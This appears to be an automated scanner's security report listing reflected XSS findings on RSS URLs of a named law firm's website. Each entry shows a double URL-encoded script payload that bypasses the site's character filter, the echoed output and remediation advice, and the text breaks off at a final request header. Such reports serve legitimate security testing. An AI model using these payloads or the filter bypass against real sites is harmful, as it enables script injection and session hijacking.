GET /rss/practices4a669%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6384682ca38/Postal/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2206f6e398b was submitted in the REST URL parameter 3. This input was echoed as e6c53"><script>alert(1)</script>2206f6e398b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Postale6c53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2206f6e398b/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a1f6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf2258d21b7 was submitted in the REST URL parameter 4. This input was echoed as 5a1f6"><script>alert(1)</script>af2258d21b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Postal/rss.xml5a1f6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf2258d21b7 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e69c57b225b was submitted in the REST URL parameter 1. This input was echoed as 35e2f"><script>alert(1)</script>69c57b225b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss35e2f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e69c57b225b/practices/Privacy/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99d2689ecdb was submitted in the REST URL parameter 2. This input was echoed as 38e63"><script>alert(1)</script>99d2689ecdb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices38e63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99d2689ecdb/Privacy/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a06f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eae4d6666dc0 was submitted in the REST URL parameter 3. This input was echoed as 5a06f"><script>alert(1)</script>ae4d6666dc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Privacy5a06f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eae4d6666dc0/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4256c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e823dd7739be was submitted in the REST URL parameter 4. This input was echoed as 4256c"><script>alert(1)</script>823dd7739be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Privacy/rss.xml4256c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e823dd7739be HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3058a7872f was submitted in the REST URL parameter 1. This input was echoed as ab6ad"><script>alert(1)</script>3058a7872f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssab6ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3058a7872f/practices/Professional_Liability/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b635c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb61d6adb13 was submitted in the REST URL parameter 2. This input was echoed as b635c"><script>alert(1)</script>bb61d6adb13 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practicesb635c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb61d6adb13/Professional_Liability/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b62f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e209c75ecebf was submitted in the REST URL parameter 3. This input was echoed as 7b62f"><script>alert(1)</script>209c75ecebf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Professional_Liability7b62f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e209c75ecebf/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3cc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e842ba8b7f27 was submitted in the REST URL parameter 4. This input was echoed as a3cc2"><script>alert(1)</script>842ba8b7f27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Professional_Liability/rss.xmla3cc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e842ba8b7f27 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43538%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e239e5feec7 was submitted in the REST URL parameter 1. This input was echoed as 43538"><script>alert(1)</script>239e5feec7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss43538%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e239e5feec7/practices/Public_Policy/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95bab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f44ea70a80 was submitted in the REST URL parameter 2. This input was echoed as 95bab"><script>alert(1)</script>4f44ea70a80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices95bab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f44ea70a80/Public_Policy/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf26f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7d3032f123 was submitted in the REST URL parameter 3. This input was echoed as bf26f"><script>alert(1)</script>e7d3032f123 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Public_Policybf26f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7d3032f123/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc78d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35e1d1edf9 was submitted in the REST URL parameter 4. This input was echoed as cc78d"><script>alert(1)</script>35e1d1edf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Public_Policy/rss.xmlcc78d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35e1d1edf9 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e1f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a2d2f96202 was submitted in the REST URL parameter 1. This input was echoed as 8e1f4"><script>alert(1)</script>0a2d2f96202 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss8e1f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a2d2f96202/practices/White_Collar_Defense/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e4a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edceb9945ee4 was submitted in the REST URL parameter 2. This input was echoed as 68e4a"><script>alert(1)</script>dceb9945ee4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices68e4a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edceb9945ee4/White_Collar_Defense/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b35%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3123ddbb2f4 was submitted in the REST URL parameter 3. This input was echoed as 74b35"><script>alert(1)</script>3123ddbb2f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/White_Collar_Defense74b35%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3123ddbb2f4/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e069fcdb3970 was submitted in the REST URL parameter 4. This input was echoed as b3f91"><script>alert(1)</script>069fcdb3970 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/White_Collar_Defense/rss.xmlb3f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e069fcdb3970 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85268%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8395fd2c6ad was submitted in the REST URL parameter 1. This input was echoed as 85268"><script>alert(1)</script>8395fd2c6ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
